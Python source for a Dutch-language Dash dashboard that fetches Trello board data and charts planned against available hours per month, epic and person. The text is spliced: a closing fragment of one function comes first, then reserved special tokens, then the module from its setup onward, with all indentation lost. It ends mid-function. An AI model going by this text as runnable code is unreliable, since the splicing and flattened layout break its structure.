config.get('Custom Field for Categories')] == categorie
]), 0))
bars.append(dict(x=data['arrays']['xaxis_months'], y=yaxis,
name=categorienaam, line={'shape': 'spline', 'smoothing':
0.4}, mode='lines+markers', marker={'symbol':
'triangle-up-open', 'size': 10}, stackgroup='one'))
yaxis = []
for i in data['arrays']['perioden']:
yaxis.append(round(sum([value['urenperperiode'][i] for value in
data['beschikbareuren'].values()]), 0))
bars.append(dict(name='Totaal beschikbare uren', mode='lines', x=data[
'arrays']['xaxis_months'], y=yaxis, size=10, line={'shape':
'spline', 'smoothing': 0.3, 'width': 6, 'color': 'black'}))
return {'data': bars, 'layout': layout}
@app.server.route('/dash/configuration/')
def download_file():
return flask.send_file('./configuration/configuration.txt',
attachment_filename='configuration.txt', as_attachment=True,
cache_timeout=0)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
try:
with open('./configuration/credentials.txt') as json_file:
credentials = json.load(json_file)
with open('./configuration/configuration.txt') as json_file:
config = json.load(json_file)
except:
raise Exception('Draai eerst deploy.py!')
locale = locale.setlocale(locale.LC_ALL, 'nl_NL.UTF-8')
globals = {'config': config, 'credentials': credentials, 'styles': {}}
board_url = ('https://api.trello.com/1/members/me/boards?fields=name&key=' +
credentials.get('API key') + '&token=' + credentials.get('API token'))
boards = json.loads(json.dumps(requests.get(board_url).json()))
globals['boards'] = boards
globals['styles']['maindivs'] = {'box-shadow': '8px 8px 8px grey',
'background-image': "url('./assets/left.png')", 'background-repeat':
'no-repeat', 'background-position': '0px 0px', 'margin-top': '1%',
'margin-bottom': '1%', 'margin-left': '1%', 'margin-right': '1%',
'text-align': 'center', 'border-radius': '10px'}
globals['styles']['tabs'] = {'border-style': 'solid', 'border-width': '2px',
'background': 'rgb(255,255,255)', 'background':
'radial-gradient(circle, rgba(255,255,255,1) 0%, rgba(162,162,162,1) 100%, rgba(255,255,255,1) 100%)'
, 'margin-top': '5px', 'margin-bottom': '5px', 'margin-right': '5px',
'margin-left': '5px', 'border-radius': '6px'}
globals['styles']['divgraphs'] = {'background-color':
'rgba(62,182,235,0.1)', 'margin-top': '1%', 'margin-bottom': '2%',
'margin-left': '1%', 'margin-right': '1%', 'text-align': 'center',
'border-radius': '10px'}
globals['styles']['dropdowns'] = {'margin-left': '1%', 'margin-right': '2%'}
globals['graphlayouts'] = {'bars': go.Layout(barmode='stack', paper_bgcolor
='rgba(0,0,0,0)', plot_bgcolor='rgba(0,0,0,0)', hovermode='closest')}
def get_data(value):
global data
global config
with open('./configuration/configuration.txt') as json_file:
configfile = json.load(json_file)
config = configfile.get(value)
keys = 'key=' + credentials.get('API key') + '&token=' + credentials.get(
'API token')
trello_base_url = 'https://api.trello.com/1/'
board_url = trello_base_url + 'boards/' + value
url_cards = (board_url +
'?cards=all&card_pluginData=true&card_attachments=true&card_customFieldItems=true&filter=all&'
+ keys)
url_lists = board_url + '/lists?filter=all&' + keys
url_customfields = board_url + '/customFields?' + keys
url_labels = board_url + '/labels?' + keys
url_members = board_url + '/members?' + keys
board = json.loads(json.dumps(requests.get(url_cards).json()))
lists = json.loads(json.dumps(requests.get(url_lists).json()))
customfields = json.loads(json.dumps(requests.get(url_customfields).json())
)
labels = json.loads(json.dumps(requests.get(url_labels).json()))
members = json.loads(json.dumps(requests.get(url_members).json()))
cards = board['cards']
def dateCalc(date):
try:
newdate = datetime.strptime(date[0:19], '%Y-%m-%dT%H:%M:%S')
return newdate
except:
return None
customfields_dict = {'date': {}, 'list': {}, 'text': {}, 'number': {},
'checkbox': {}}
for i in customfields:
customfields_dict[i['type']] = {}
for i in customfields:
customfields_dict[i['type']][i['id']] = {}
for i in customfields:
if i['type'] == 'list':
customfields_dict[i['type']][i['id']]['name'] = i['name']
customfields_dict['list'][i['id']]['options'] = {}
for j in i['options']:
customfields_dict['list'][i['id']]['options'][j['id']] = j[
'value'].get('text')
else:
customfields_dict[i['type']][i['id']]['name'] = i['name']
chosenlists = []
for i in config.get('Not Started'):
chosenlists.append(i)
chosenlists.extend(config.get('Blocked'))
chosenlists.extend(config.get('Doing'))
chosenlists.extend(config.get('Done'))
for i in config.get('Epics'):
chosenlists.append(i)
for i in config.get('Always continuing'):
chosenlists.append(i)
for i in config.get('List with Epics Done'):
chosenlists.append(i)
def idtodate(cardid):
hex = cardid[0:8]
timestamp = int(hex, 16)
timedate = datetime.fromtimestamp(timestamp)
return timedate
def get_epicid(url):
try:
if 'epicId=' in url:
start = url.find('epicId=') + 7
end = url.find('&attachmentId=')
return url[start:end]
else:
pass
except:
pass
kaarten = {i['id']: {'Naam': i['name'], 'KaartID': i['id'], 'ListID': i
['idList'], 'customfields': i['customFieldItems'], 'Aangemaakt':
idtodate(i['id']), 'labels': [label['name'] for label in i['labels'
] if i['labels'] != []], 'members': [member['fullName'] for member in
members if member['id'] in i['idMembers']], 'Sjabloon': i[
'isTemplate'], 'Vervaldatum': dateCalc(i['due']), 'Gearchiveerd': i
['closed'], 'epicid': [get_epicid(j['url']) for j in i[
'attachments']], 'Epic': None, 'shortUrl': i['shortUrl']} for i in
cards}
for i, j in kaarten.items():
while None in j['epicid']:
j['epicid'].remove(None)
if j['members'] != []:
j['Leden'] = ''
for k in j['members']:
if j['Leden'] == '':
j['Leden'] += k
else:
j['Leden'] += ', ' + k
else:
j['Leden'] = None
del j['members']
if customfields_dict != {}:
for i, j in customfields_dict.items():
for k, l in j.items():
for m, n in kaarten.items():
n[l['name']] = None
for i, j in kaarten.items():
for k in j['customfields']:
if k['idCustomField'] in customfields_dict['list'].keys():
j[customfields_dict['list'][k['idCustomField']].get('name')
] = customfields_dict['list'][k['idCustomField']][
'options'].get(k['idValue'])
elif k['idCustomField'] in customfields_dict['checkbox'].keys(
):
if k['value']['checked'] == 'true':
j[customfields_dict['checkbox'][k['idCustomField']]
.get('name')] = True
else:
j[customfields_dict['checkbox'][k['idCustomField']]
.get('name')] = False
elif k['idCustomField'] in customfields_dict['date'].keys():
j[customfields_dict['date'][k['idCustomField']].get('name')
] = dateCalc(k['value'].get('date'))
else:
for key in k['value']:
j[customfields_dict[key][k['idCustomField']].get(
'name')] = k['value'].get(key)
epicIdNameCategory = []
for i, j in kaarten.items():
epicIdNameCategory.append((i, j['Naam'], j[config.get(
'Custom Field for Categories')]))
for i, j in kaarten.items():
if j['epicid'] == []:
j['Epic'] = 'Geen epic'
j['Categorie'] = None
else:
for k in epicIdNameCategory:
if k[0] == j['epicid'][0]:
j['Epic'] = k[1]
j['Categorie'] = k[2]
del j['epicid']
for i, j in kaarten.items():
for k in lists:
if j['ListID'] == k['id']:
j['Lijst'] = k['name']
if j['Lijst'] in config.get('Not Started'):
j['Status'] = 'Niet gestart'
elif j['Lijst'] in config.get('Doing'):
j['Status'] = 'Doing'
elif j['Lijst'] in config.get('Blocked'):
j['Status'] = 'Blocked'
elif j['Lijst'] in config.get('Done'):
j['Status'] = 'Done'
elif j['Lijst'] in config.get('Always continuing'):
j['Status'] = 'Doorlopend'
elif j['Lijst'] in config.get('Epics'):
j['Status'] = 'Epics Doing'
elif j['Lijst'] in config.get('List with Epics Done'):
j['Status'] = 'Epics Done'
else:
j['Status'] = 'Archived'
del j['customfields']
del j['ListID']
for i, j in kaarten.items():
if j['Gearchiveerd'] == True and j['Status'] != 'Done':
j['Status'] = 'Archived'
liststodelete = []
for i in lists:
if i['name'] not in chosenlists:
liststodelete.append(i['name'])
cardstodelete = []
for i, j in kaarten.items():
if j['Sjabloon'] == True:
cardstodelete.append(i)
elif j['Lijst'] in liststodelete:
cardstodelete.append(i)
hours = {}
for i, j in kaarten.items():
if j['Lijst'] == config.get('List for hours'):
hours[j['Naam']] = {config['Custom Field for Starting date']: j
[config['Custom Field for Starting date']], config[
'Custom Field for Ending date']: j[config[
'Custom Field for Ending date']], config[
'Custom Field with hours']: j[config[
'Custom Field with hours']]}
for i in cardstodelete:
if i in kaarten:
del kaarten[i]
tmpdatesdict = {}
now = datetime.now().date()
numdays = 365
numdayshistory = 183
for x in range(0, numdays):
tmpdatesdict[str(now + timedelta(days=x))] = {}
for x in range(0, numdayshistory):
tmpdatesdict[str(now - timedelta(days=x))] = {}
dates = []
for i in sorted(tmpdatesdict):
dates.append(i)
arrays = {'epics': list(dict.fromkeys([card['Epic'] for card in kaarten
.values()])), 'xaxis_months': list(dict.fromkeys([(i[0:4] + '-' + i
[5:7] + '-01') for i in dates])), 'perioden': list(dict.fromkeys([(
i[0:4] + i[5:7]) for i in dates])), 'statuses': list(dict.fromkeys(
[card['Status'] for card in kaarten.values()])), config.get(
'Custom Field for Categories'): list(dict.fromkeys([card[config.get
('Custom Field for Categories')] for card in kaarten.values()])),
config.get('Custom Field for Person'): list(dict.fromkeys([(card[
config.get('Custom Field for Person')] if card[config.get(
'Custom Field for Person')] != None else 'Geen ' + config.get(
'Custom Field for Person')) for card in kaarten.values()]))}
try:
urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
get('Custom Field for Starting date'): kaart[config.get(
'Custom Field for Starting date')], config.get(
'Custom Field for Ending date'): kaart[config.get(
'Custom Field for Ending date')], 'Gebied': kaart['Gebied'],
config.get('Custom Field for Person'): kaart[config.get(
'Custom Field for Person')], config.get(
'Custom Field for Categories'): kaart[config.get(
'Custom Field for Categories')], config.get(
'Custom Field with hours'): kaart[config.get(
'Custom Field with hours')], 'Cognosrapport': kaart[
'Cognosrapport'], 'Niet meenemen in telling': kaart[
'Niet meenemen in telling'], 'Lijst': kaart['Lijst'], 'Status':
kaart['Status'], 'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for
kaart in kaarten.values()}
except:
urenperdagperkaart = {kaart['Naam']: {'Naam': kaart['Naam'],
'Leden': kaart['Leden'], 'Aangemaakt': kaart['Aangemaakt'],
'Epic': kaart['Epic'], 'shortUrl': kaart['shortUrl'], config.
get('Custom Field for Starting date'): kaart[config.get(
'Custom Field for Starting date')], config.get(
'Custom Field for Ending date'): kaart[config.get(
'Custom Field for Ending date')], config.get(
'Custom Field for Person'): kaart[config.get(
'Custom Field for Person')], config.get(
'Custom Field for Categories'): kaart[config.get(
'Custom Field for Categories')], config.get(
'Custom Field with hours'): kaart[config.get(
'Custom Field with hours')], 'Lijst': kaart['Lijst'], 'Status':
kaart['Status'], 'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for
kaart in kaarten.values()}
beschikbareuren = {key: {'urenperdag': {i: (0) for i in dates},
'urenperperiode': {i: (0) for i in arrays['perioden']}} for key in
hours.keys()}
for i in dates:
datekey = datetime.strptime(i, '%Y-%m-%d').date()
for k, l in kaarten.items():
if l['Niet meenemen in telling'] != True:
try:
if l[config.get('Custom Field for Starting date')].date(
) < datekey <= l[config.get(
'Custom Field for Ending date')].date():
delta = l[config.get('Custom Field for Ending date')
] - l[config.get('Custom Field for Starting date')]
hoursperday = int(l[config.get(
'Custom Field with hours')]) / int(delta.days)
urenperdagperkaart[l['Naam']]['urenperdag'][i
] = hoursperday
except:
pass
for k, l in hours.items():
try:
if l[config.get('Custom Field for Starting date')].date(
) < datekey <= l[config.get('Custom Field for Ending date')
].date():
hoursperday = int(l[config.get('Custom Field with hours')]
) / int(30.4)
beschikbareuren[k]['urenperdag'][i] = hoursperday
except:
pass
for i, j in urenperdagperkaart.items():
for k, l in j['urenperdag'].items():
for m in j['urenperperiode'].keys():
if m == k[0:4] + k[5:7]:
j['urenperperiode'][m] += l
for i, j in beschikbareuren.items():
for k, l in j['urenperdag'].items():
for m in j['urenperperiode'].keys():
if m == k[0:4] + k[5:7]:
j['urenperperiode'][m] += l
dfurenpermaand = copy.deepcopy(urenperdagperkaart)
for i, j in dfurenpermaand.items():
try:
j['Geplande uren'] = int(j['Geplande uren'])
except:
j['Geplande uren'] = 0
for k, l in j['urenperperiode'].items():
j[k] = round(l, 2)
del j['urenperperiode']
bars = []
labelsnietingepland = []
for j in kaarten.values():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
labelsnietingepland.append(j['Lijst'])
labelsnietingepland = list(dict.fromkeys(labelsnietingepland))
for i, j in kaarten.items():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
tmp = []
for label in labelsnietingepland:
if j['Lijst'] == label:
tmp.append(int(j['Geplande uren']))
else:
tmp.append(0)
bars.append(dict(x=labelsnietingepland, y=tmp, name=j['Naam'],
type='bar', opacity='0.6'))
epicbars = []
tmpepicsforbarchart = {epic: (0) for epic in [name['Naam'] for name in
kaarten.values() if name['Status'] in ['Epics Doing', 'Epics Done']]}
tmpepicsforbarchart['Geen epic'] = 0
for i, j in kaarten.items():
if j[config.get('Custom Field for Starting date')] == None and j[config
.get('Custom Field for Ending date')] == None and j[config.get(
'Custom Field with hours')] != None and j['Status'
] == 'Niet gestart':
tmpepicsforbarchart[j['Epic']] += int(j[config.get(
'Custom Field with hours')])
epicsforbarchart = {k: v for k, v in tmpepicsforbarchart.items() if v != 0}
epicbars.append(dict(x=[key for key in epicsforbarchart.keys()], y=[
value for value in epicsforbarchart.values()], type='bar', text=[
value for value in epicsforbarchart.values()], textposition=
'outside', opacity='0.6'))
thismonth = datetime.strftime(datetime.now(), '%Y%m')
nextmonth = (datetime.now() + relativedelta(months=1)).strftime('%Y%m')
twomonths = (datetime.now() + relativedelta(months=2)).strftime('%Y%m')
arrays['threemonths'] = [(thismonth, datetime.strptime(thismonth,
'%Y%m').strftime('%B')), (nextmonth, datetime.strptime(nextmonth,
'%Y%m').strftime('%B')), (twomonths, datetime.strptime(twomonths,
'%Y%m').strftime('%B'))]
gaugegeplandthismonth = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
thismonth]))
gaugegeplandnextmonth = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
nextmonth]))
gaugegeplandtwomonths = round(sum([value for card in urenperdagperkaart
.values() for keys, value in card['urenperperiode'].items() if keys ==
twomonths]))
deltathismonth = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == thismonth]))
deltanextmonth = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == nextmonth]))
deltatwomonths = round(sum([value for card in beschikbareuren.values() for
keys, value in card['urenperperiode'].items() if keys == twomonths]))
if deltathismonth > gaugegeplandthismonth:
gaugerangethismonth = deltathismonth + 20
else:
gaugerangethismonth = gaugegeplandthismonth + 20
if deltanextmonth > gaugegeplandnextmonth:
gaugerangenextmonth = deltanextmonth + 20
else:
gaugerangenextmonth = gaugegeplandnextmonth + 20
if deltatwomonths > gaugegeplandtwomonths:
gaugerangetwomonths = deltatwomonths + 20
else:
gaugerangetwomonths = gaugegeplandtwomonths + 20
gaugestepsthismonth = {'axis': {'range': [None, gaugerangethismonth]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltathismonth *
0.5], 'color': '#3deb34'}, {'range': [deltathismonth * 0.5,
deltathismonth * 0.75], 'color': '#b4eb34'}, {'range': [
deltathismonth * 0.75, deltathismonth * 0.9], 'color': '#ebb434'},
{'range': [deltathismonth * 0.9, deltathismonth], 'color':
'#eb6e34'}, {'range': [deltathismonth, gaugerangethismonth],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltathismonth}}
gaugestepsnextmonth = {'axis': {'range': [None, gaugerangenextmonth]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltanextmonth *
0.5], 'color': '#3deb34'}, {'range': [deltanextmonth * 0.5,
deltanextmonth * 0.75], 'color': '#b4eb34'}, {'range': [
deltanextmonth * 0.75, deltanextmonth * 0.9], 'color': '#ebb434'},
{'range': [deltanextmonth * 0.9, deltanextmonth], 'color':
'#eb6e34'}, {'range': [deltanextmonth, gaugerangenextmonth],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltanextmonth}}
gaugestepstwomonths = {'axis': {'range': [None, gaugerangetwomonths]},
'bar': {'color': '#3eb6eb'}, 'steps': [{'range': [0, deltatwomonths *
0.5], 'color': '#3deb34'}, {'range': [deltatwomonths * 0.5,
deltatwomonths * 0.75], 'color': '#b4eb34'}, {'range': [
deltatwomonths * 0.75, deltatwomonths * 0.9], 'color': '#ebb434'},
{'range': [deltatwomonths * 0.9, deltatwomonths], 'color':
'#eb6e34'}, {'range': [deltatwomonths, gaugerangetwomonths],
'color': '#eb3434'}], 'threshold': {'line': {'color': '#5c0000',
'width': 4}, 'thickness': 0.75, 'value': deltatwomonths}}
gaugefig = go.Figure()
gaugefig.add_trace(go.Indicator(domain={'x': [0, 0.3], 'y': [0, 1]},
value=gaugegeplandthismonth, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(thismonth, '%Y%m').
strftime('%B')}, delta={'reference': deltathismonth}, gauge=
gaugestepsthismonth))
gaugefig.add_trace(go.Indicator(domain={'x': [0.35, 0.65], 'y': [0, 1]},
value=gaugegeplandnextmonth, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(nextmonth, '%Y%m').
strftime('%B')}, delta={'reference': deltanextmonth}, gauge=
gaugestepsnextmonth))
gaugefig.add_trace(go.Indicator(domain={'x': [0.7, 1], 'y': [0, 1]},
value=gaugegeplandtwomonths, mode='gauge+number+delta', title={
'text': 'Totale uren voor ' + datetime.strptime(twomonths, '%Y%m').
strftime('%B')}, delta={'reference': deltatwomonths}, gauge=
gaugestepstwomonths))
gaugefig.update_layout(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
graphdata = {'nietingepland': bars, 'nietingeplandepics': epicbars,
'gaugefig': gaugefig}
columntypes = {}
for key, value in kaarten[next(iter(kaarten))].items():
if 'datum' in key or key == 'Aangemaakt':
columntypes[key] = 'datetime'
elif type(value) == int:
columntypes[key] = 'numeric'
elif type(value in [str, bool]):
columntypes[key] = 'text'
columntypesurenpermaand = dict(columntypes)
columntypesurenpermaand.update({i: 'text' for i in arrays['perioden']})
data = {'kaarten': kaarten, 'arrays': arrays, 'urenperdagperkaart':
urenperdagperkaart, 'beschikbareuren': beschikbareuren, 'graphdata':
graphdata, 'dfs': {'kaartendf': pd.DataFrame(data=kaarten).T,
'columntypes': columntypes, 'urenpermaand': pd.DataFrame(data=
dfurenpermaand).T, 'columntypesurenpermaand': columntypesurenpermaand}}
def make_layout():
return html.Div(className='First Div', children=[html.Div(style={
'font-style': 'italic', 'font-weight': 'bold', 'border': '10px',
'box-shadow': '8px 8px 8px grey', 'background': 'rgb(149,193,31)',
'background':
'linear-gradient(133deg, rgba(62,182,235,1) 0%, rgba(243,253,255,1) 76%, rgba(243,253,255,0) 100%)'
, 'margin-top': '1%', 'margin-bottom': '1%', 'margin-right': '1%',
'margin-left': '1%', 'border-radius': '10px', 'text-align':
'center'}, className='Banner', children=[html.Div(style={'display':
'inline-block', 'width': '80%'}, children=[html.H1(
'Trello borden USD')]), html.Div(style={'display': 'inline-block',
'margin-right': '1px'}, children=[html.Img(src=app.get_asset_url(
'logonop.png'), style={'width': '150px', 'margin-right': '0px'})])]
), html.H5('Kies hieronder een bord', style={'text-align': 'center'
}), dcc.Dropdown(id='dropdown_boards', options=[{'label': i['name'],
'value': i['id']} for i in boards], value=boards[0]['id']), html.
Button('Data verversen', id='refreshdatabtn', n_clicks=0), html.Div
(id='test')])
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
external_scripts = ['https://cdn.plot.ly/plotly-locale-nl-latest.js']
app = dash.Dash(__name__, external_stylesheets=external_stylesheets,
external_scripts=external_scripts, url_base_pathname='/dash/')
app.layout = make_layout
app.config['suppress_callback_exceptions'] = True
@app.callback(Output('test', 'children'), [Input('dropdown_boards', 'value'
), Input('refreshdatabtn', 'n_clicks')])
def create_maindiv(value, n_clicks):
get_data(value)
import os
if os.name == 'nt':
daterefreshed = datetime.strftime(datetime.now(), '%A %d %b, %H:%M')
else:
daterefreshed = datetime.strftime(datetime.now(), '%A %-d %B, %H:%M')
return html.Div(className='', children=[dcc.Markdown(
'**Laatst ververst: **' + daterefreshed), dcc.Tabs(className='Tabs',
children=[dcc.Tab(label='Gantt charts', style=globals['styles'][
'tabs'], children=[html.Div(className='tab2_div1', style=globals[
'styles']['maindivs'], children=[html.H3('Uitleg'), html.Div(style=
globals['styles']['divgraphs'], children=[dcc.Markdown(
'In dit tabblad worden de kaarten in GANTT charts weergegeven. Kies in de dropdown voor welke epic de kaarten moeten worden weergegeven.'
)])]), html.Div(className='tab2_div2', style=globals['styles'][
'maindivs'], children=[html.H4('Gantt per epic'), dcc.Dropdown(
style=globals['styles']['dropdowns'], id='dropdownganttepics',
options=[{'label': name, 'value': name} for name in data['arrays'][
'epics']], value=[next(iter(data['arrays']['epics']))]), html.Div(
style=globals['styles']['divgraphs'], children=[dcc.Graph(id=
'ganttepics')])]), html.Div(className='tab2_div3', style=globals[
'styles']['maindivs'], children=[html.H4('Gantt per persoon'), dcc.
Dropdown(style=globals['styles']['dropdowns'], id=
'dropdownganttpersoon', options=[{'label': name, 'value': name} for
name in data['arrays'][config.get('Custom Field for Person')]]),
dcc.Dropdown(style=globals['styles']['dropdowns'], id=
'dropdownganttpersoonstatus', options=[{'label': name, 'value':
name} for name in data['arrays']['statuses']], value=data['arrays']
['statuses'], multi=True), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Graph(id='ganttpersoon')])])]), dcc.Tab
(label='Data export', style=globals['styles']['tabs'], children=[
html.Div(className='tab3_div1', style=globals['styles']['maindivs'],
children=[html.H3('Uitleg'), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Markdown(
"Hieronder kan de data worden geëxporteerd. Via de buttons 'Export' downloadt je een excelbestand."
), dcc.Markdown(
"In het dashboard kun je met de knop 'Toggle columns' ook velden zichtbaar maken, om van tevoren te filteren. Kies dan de velden, filter daarna en klik op 'Export'."
)])]), html.Div(className='tab3_div2', style=globals['styles'][
'maindivs'], children=[html.H4('Platte dump'), dcc.Markdown(
'Deze tabel laat de platte data zien, zoals in Trello gevuld.'),
dash_table.DataTable(id='table_plattedump', columns=[{'name': i,
'id': i, 'type': data['dfs']['columntypes'].get(i), 'hideable':
True} for i in data['dfs']['kaartendf'].columns if i in data['dfs']
['columntypes'].keys()], data=data['dfs']['kaartendf'].to_dict(
'records'), hidden_columns=[i for i in data['dfs']['columntypes']],
export_format='xlsx', export_headers='display', export_columns=
'all', filter_action='native', sort_action='native', sort_mode=
'multi', style_table={'overflowX': 'scroll'}, style_header={
'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',
'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={
'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',
'text-align': 'left', 'fontFamily': 'Arial', 'height': 'auto'})]),
html.Div(className='tab3_div3', style=globals['styles']['maindivs'],
children=[html.H4('Uren per maand'), dcc.Markdown(
'Hieronder kan een export gemaakt worden van de uren zoals ze per maand zijn ingepland.'
), dcc.Markdown(
'Ook hierin kan gefilterd worden. filter bijvoorbeeld in de maand naar keuze op >0 om alle kaarten die geen ingeplande uren hebben niet te tonen.'
), dash_table.DataTable(id='table_urenpermaand', columns=[{'name':
i, 'id': i, 'type': data['dfs']['columntypesurenpermaand'].get(i),
'hideable': True} for i in data['dfs']['urenpermaand'].columns if i in
data['dfs']['columntypesurenpermaand'].keys()], data=data['dfs'][
'urenpermaand'].to_dict('records'), hidden_columns=[i for i in data
['dfs']['columntypesurenpermaand']], export_format='xlsx',
export_headers='display', export_columns='all', filter_action=
'native', sort_action='native', sort_mode='multi', style_header={
'backgroundColor': 'rgba(62,182,235,0.6)', 'color': 'black',
'fontWeight': 'bold', 'fontFamily': 'Arial'}, style_cell={
'backgroundColor': 'rgba(62,182,235,0.2)', 'color': 'black',
'text-align': 'left', 'fontFamily': 'Arial'})])]), dcc.Tab(label=
'Langetermijnplanning', style=globals['styles']['tabs'], children=[
html.Div(className='maindivs', style=globals['styles']['maindivs'],
children=[html.H3('Uitleg'), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Markdown(
'In dit tabblad wordt een langetermijnplanning getoond.'), dcc.
Markdown('De focus hierbij ligt vooral op de categorieen.')])]),
html.Div(className='maindivs', style=globals['styles']['maindivs'],
children=[html.H4('Ingeplande uren per categorie'), dcc.Dropdown(
style=globals['styles']['dropdowns'], id='dropdownurenpermaand',
options=[{'label': name, 'value': name} for name in data['arrays'][
config.get('Custom Field for Categories')] if name != None], multi=
True, searchable=False, value=data['arrays'][config.get(
'Custom Field for Categories')]), html.Div(style=globals['styles'][
'divgraphs'], children=[dcc.Graph(id='urenpermaand')])]), html.Div(
className='tab1_div3', style=globals['styles']['maindivs'],
children=[html.H4('Nog in te plannen uren (per lijst)'), dcc.
Markdown(
'*Nieuw* zijn werkzaamheden die **nog niet** zijn besproken of ze worden gedaan.'
), dcc.Markdown(
'*Wensenlijst* zijn werkzaamheden die **wel** zijn besproken, maar **geen prioriteit** hebben.'
), dcc.Markdown(
'*Inplannen* zijn werkzaamheden die **moeten** gebeuren.'), dcc.
Markdown(
'**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'
), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
Graph(id='graph_nietingepland', figure={'data': data['graphdata'][
'nietingepland'], 'layout': globals['graphlayouts']['bars']})])]),
html.Div(className='tab1_div4', style=globals['styles']['maindivs'],
children=[html.H4('Nog in te plannen uren (per epic)'), dcc.
Markdown(
'**NB:** Alleen werkzaamheden waarvan we een ureninschatting kunnen maken, worden getoond!'
), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
Graph(id='graph_nietingepland_epics', figure={'data': data[
'graphdata']['nietingeplandepics'], 'layout': globals[
'graphlayouts']['bars']})])])]), dcc.Tab(style=globals['styles'][
'tabs'], label='Tactische planning', children=[html.Div(className=
'maindivs', style=globals['styles']['maindivs'], children=[html.H3(
'Uitleg'), dcc.Markdown(
'In dit tabblad is een middellange termijnplanning te zien.')]),
html.Div(className='maindivs', style=globals['styles']['maindivs'],
children=[html.H4('Totalen'), dcc.Markdown(
'Hieronder staan twee totaaloverzichten van de aankomende maanden.'
), dcc.Markdown(
'De blauwe balk geeft de ingeplande uren weer. De streep geeft de beschikbare uren aan.'
), dcc.Markdown(
'Het kleine getal eronder geeft aan hoeveel uren tekort/over zijn voor die maand.'
), html.Div(style=globals['styles']['divgraphs'], children=[dcc.
Graph(figure=data['graphdata']['gaugefig'])])]), html.Div(className
='maindivs', style=globals['styles']['maindivs'], children=[html.H4
('Gantt'), dcc.Dropdown(style=globals['styles']['dropdowns'], id=
'dropdowngantttactisch', options=[{'label': j, 'value': i} for i, j in
data['arrays']['threemonths']], multi=False, searchable=False,
value=data['arrays']['threemonths'][0][0]), html.Div(style=globals[
'styles']['divgraphs'], children=[dcc.Graph(id='gantttactisch')])])
])])])
@app.callback(Output('gantttactisch', 'figure'), [Input(
'dropdowngantttactisch', 'value')])
def update_gantttactisch(v1):
if v1 != None:
if v1[4:] == '12':
v1plus1 = str(int(v1[0:4]) + 1) + '01'
else:
v1plus1 = str(int(v1) + 1)
if v1[4:] == '01':
v1min1 = str(int(v1[0:4]) - 1) + '12'
else:
v1min1 = str(int(v1) - 1)
if v1[4:] == '11':
v1plus2 = str(int(v1[0:4]) + 1) + '01'
else:
v1plus2 = str(int(v1) + 2)
import random
import numpy as np
from operator import itemgetter
ganttdata = []
monthkey = int(v1)
for i, j in data['kaarten'].items():
if j['Status'] in ['Niet gestart', 'Doing', 'Blocked']:
try:
if int(datetime.strftime(j['Begindatum'], '%Y%m')
) <= monthkey and int(datetime.strftime(j[
'Einddatum'], '%Y%m')) >= monthkey:
if j['Begindatum'].date() < datetime.strptime(
v1min1 + '01', '%Y%m%d').date():
start = datetime.strptime(v1min1 + '01', '%Y%m%d'
).date()
else:
start = j['Begindatum'].date()
if j['Einddatum'].date() >= datetime.strptime(
v1plus2 + '01', '%Y%m%d').date():
eind = datetime.strptime(v1plus2 + '01', '%Y%m%d'
).date()
else:
eind = j['Einddatum'].date()
ganttdata.append(dict(Task=j['Epic'], Start=start,
Finish=eind, Resource=j['Naam'] + ' (uren: ' +
str(round(data['urenperdagperkaart'][j['Naam']]
['urenperperiode'][v1])) + ')'))
except:
pass
result = sorted(ganttdata, key=itemgetter('Task'))
rgb = []
for c in range(len(result)):
r = list(np.random.choice(range(256), size=3))
s2 = ','.join(map(str, r))
s1 = 'rgb('
s3 = ')'
rgb.append(s1 + s2 + s3)
fig = ff.create_gantt(result, index_col='Resource', show_colorbar=
True, group_tasks=False, showgrid_x=True, showgrid_y=True,
colors=rgb)
fig['layout'].update(paper_bgcolor='rgba(0,0,0,0)', plot_bgcolor=
'rgba(0,0,0,0)')
fig.add_trace(go.Scatter(mode='lines', x=[v1[0:4] + '-' + v1[4:] +
'-01', v1[0:4] + '-' + v1[4:] + '-01'], y=[-1, len(result)],
line={'shape': 'spline', 'color': 'black', 'width': 4},
showlegend=False))
fig.add_trace(go.Scatter(mode='lines', x=[v1plus1[0:4] + '-' +
v1plus1[4:] + '-01', v1plus1[0:4] + '-' + v1plus1[4:] + '-01'],
y=[-1, len(result)], line={'shape': 'spline', 'color': 'black',
